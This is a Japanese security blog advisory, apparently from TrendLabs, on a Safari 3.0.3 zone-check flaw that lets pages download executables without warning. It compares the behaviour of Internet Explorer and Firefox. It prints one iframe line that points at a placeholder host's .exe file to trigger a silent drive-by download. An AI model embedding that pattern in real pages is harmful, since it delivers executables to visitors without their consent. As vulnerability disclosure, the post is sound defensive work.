Safari 3.0.3に実行ファイルの自動ダウンロードの危険性

 10月6日、ネオハプシス社(米 NEOHAPSIS)が運営するメーリング・リスト「Full-Disclosure」に対し、アップル社のWebブラウザ Safari 3.0.3に関する脆弱性情報が投稿されました。

 TrendLabsでは、本脆弱性に対する詳細分析を実施しています。その結果、警告メッセージが表示されずに実行ファイルがダウンロードされる危険性を抱えていることを確認いたしました。

 本情報はすでにTrendLabs Malware Blog(英語ブログ:Zero-day Flaw in Safari 3.0.03 Web Browser for Windows)にて報告させていただきました。すでに英語ブログをご確認いただいている方もいらっしゃるのではないでしょうか。

 ここでは、その報告内容を背景とともに振り返ってみたいと思います。

 「Safari」はアップル社のOSであるMac OS Xの標準Webブラウザです。2007年6月11日に初のWindows XP/Vista版を含む「Safari 3」英語版パブリックベータを公開しました。

Safari 3パブリックベータダウンロードページ
Apple社のSafari 3パブリックベータダウンロードページをSafari 3.0.03で表示。
同ページでは、Internet Explorer 7 / Firefox 2 / Opera 9の競合ソフトウェア 3社とのベンチマークテスト結果を掲載し、Safariの優位性を紹介しています。

 NetApplications.comの2007年9月調査によれば、Safariはすでに5%(業界第3位。1位はInternet Explorer:78%、2位はFirefox:15%)の市場を確保しています。今後Windowsプラットフォームへの拡張、iPhoneやiPodへの実装により、更に市場規模を伸ばしていくものと思われます。

 セキュリティ関係者もSafariに対し高い関心をもって調査を進めています。「Safari 3」のファーストパブリックベータバージョンが公開された際には、その翌日 6月12日に3つの脆弱性(CVE-2007-2391CVE-2007-3185CVE-2007-3186)の報告を行っています。(英語ブログ:New Safari 3 Beta for Windows insecure

 今回新たにリリースされたバージョン 3.0.03においても、これまでの報告とは異なる脆弱性を確認しています。今回の脆弱性は、不十分なゾーン判定に起因するものでした。
 Webブラウザでは、Webコンテンツからの攻撃に対抗するため、Webサイト毎(ゾーン毎)にページ内の機能に制限を課す機能が重要です。

 Safari 3.0.3(522.15.5) for Windows英語版では、適切なゾーン判定がなされないため、次のようなIFRAMEタグによって、任意の実行ファイルを自動的にダウンロードする危険性を抱えています。

 なお、iPhone 1.0.2に実装されているSafariにおいても、同様の危険性を抱えています。(* 注釈1)

iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe”
name=”iframe” id=”iframe”

IFRAMEタグページをSafariで表示
Safari 3.0.03を使用し、IFRAMEタグを使用した脆弱性検証ページを表示。
警告を促すポップアップウインドウなど表示されることなく、ページを開いた瞬間に直ちにダウンロードが開始されています。


 過去、Internet ExplorerやFirefoxなどWindowsプラットフォームで先行する他のWebブラウザにおいても、同じ危険性を抱えていました。

 Internet Explorerでは、Windows XP Service Pack 2以降において、「情報バー」(*注釈2)の実装により、実行ファイルのダウンロードブロックが行われています。


IEの「情報バー」機能
IFRAMEタグを悪用した自動ダウンロード攻撃に対し、Internet Explorerでは、「情報バー」によるダウンロードのブロックで対抗している。

 一方、Firefox 2においては、ファイルのダウンロードをブロックすることはないものの、表示されるウインドウは[ファイルを保存]するボタンしか表示されません。このため、利用者の意図した操作がなければ、ファイルが実行されることはないといえます。


Firefox 2のダウンロードウインドウ
Firefox 2では、ダウンロードウインドウが表示されるものの、利用者が[キャンセル]をクリックすることで、危険は回避可能です。また、誤って[ファイルを保存]をクリックしても、直ちにファイルが実行されることはありません。このため、ユーザの意図した操作がなければ、悪意あるファイルが実行される危険性は低いと判断できます。

 「Safari 3」は現在正式版ではありません。このため、検証目的以外で使用することは望ましくありません。

 検証目的の利用においても、危険性を抱えていることを理解し、外部サイトの閲覧を控えるなど限定的な利用で検証を行うことが望ましいといえます。

 今回のように、パブリックベータ期間中に脆弱性が見つけられることはソフトウェアメーカにとっても、利用者にとっても望ましい状況といえます。

 また、バージョン 3よりクロスプラットフォーム展開するSafariにおいては、Windows版で報告された脆弱性に対する修正がMac OS X版やiPhone/iPod touch版への反映も期待できます。

 Apple社が提供するWebブラウザが彼らの目指す「世界でもっとも先進的なブラウザ」へと成長できるのか、今後もセキュリティ技術者、そして利用者として注目の的です。


注釈1. iPhone / iPod touchでは、Safariブラウザによるウェブブラウズをサポートしています。
注釈2. Microsoft社:「Windows XP SP2 の Internet Explorer の情報バーについて

Related posts:

  1. 続・大規模な「Webからの脅威」
  2. 新たな正規サイト改ざんケース
  3. 2007年 マイクロソフト セキュリティ更新プログラムの振り返り(後編)
  4. インターネット検索エンジンから流出する機密情報